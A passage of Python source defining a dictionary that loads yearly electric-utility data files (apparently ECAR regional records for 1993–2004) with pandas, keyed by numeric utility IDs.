1993 : pd.read_fwf('%s/ecar/1993/DECO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/DECO94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/DECO95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/DECO96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/DECO97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/DECO98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/DECO99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/DECO00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/DECO01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/DECO02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/DECO03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/DECO04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
5487 : {
1993 : pd.read_fwf('%s/ecar/1993/DLCO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/DLCO94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/DLCO95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/DLCO96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/DLCO97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/DLCO98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/DLCO99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/DLCO00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/DLCO01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/DLCO02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/DLCO03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/DLCO04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
5580 : {
1993 : pd.read_fwf('%s/ecar/1993/EKPC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/EKPC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/EKPC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/EKPC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/EKPC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/EKPC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/EKPC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/EKPC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/EKPC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/EKPC02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/EKPC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/EKPC04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9267 : {
1993 : pd.read_fwf('%s/ecar/1993/HEC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/HEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/HEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/HEC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/HEC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/HEC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/HEC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/HEC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/HEC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/HEC02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/HEC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/HEC04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9273 : {
1993 : pd.read_fwf('%s/ecar/1993/IPL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/IPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/IPL95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/IPL96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/IPL97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/IPL98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/IPL99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/IPL00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/IPL01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/IPL02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/IPL03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/IPL04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
10171 : {
1993 : pd.read_fwf('%s/ecar/1993/KUC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/KUC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/KUC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/KUC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/KUC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
11249 : {
1993 : pd.read_fwf('%s/ecar/1993/LGE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/LGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/LGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/LGE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/LGE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/LGEE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/LGEE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/LGEE00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/LGEE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/LGEE02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/LGEE03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/LGEE04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
13756 : {
1993 : pd.read_fwf('%s/ecar/1993/NIPS93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/NIPS94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/NIPS95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/NIPS96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/NIPS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/NIPS98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/NIPS99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/NIPS00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/NIPS01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/NIPS02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/NIPS03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/NIPS04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
13998 : {
1993 : pd.read_fwf('%s/ecar/1993/OES93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/OES94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/OES95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/OES96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
14015 : {
1993 : pd.read_fwf('%s/ecar/1993/OVEC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/OVEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/OVEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/OVEC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/OVEC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/OVEC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/OVEC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/OVEC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/OVEC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/OVEC02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/OVEC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/OVEC04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
15470 : {
1993 : pd.read_fwf('%s/ecar/1993/PSI93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/PSI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/PSI95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
17633 : {
1993 : pd.read_fwf('%s/ecar/1993/SIGE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/SIGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/SIGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/SIGE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/SIGE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/SIGE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/SIGE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/SIGE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/SIGE02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/SIGE03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/SIGE04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
18997 : {
1993 : pd.read_fwf('%s/ecar/1993/TECO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/TECO94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/TECO95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/TECO96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
40211 : {
1994 : pd.read_fwf('%s/ecar/1994/WVPA94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/ecar/2003/WVPA03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/WVPA04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
32208 : {
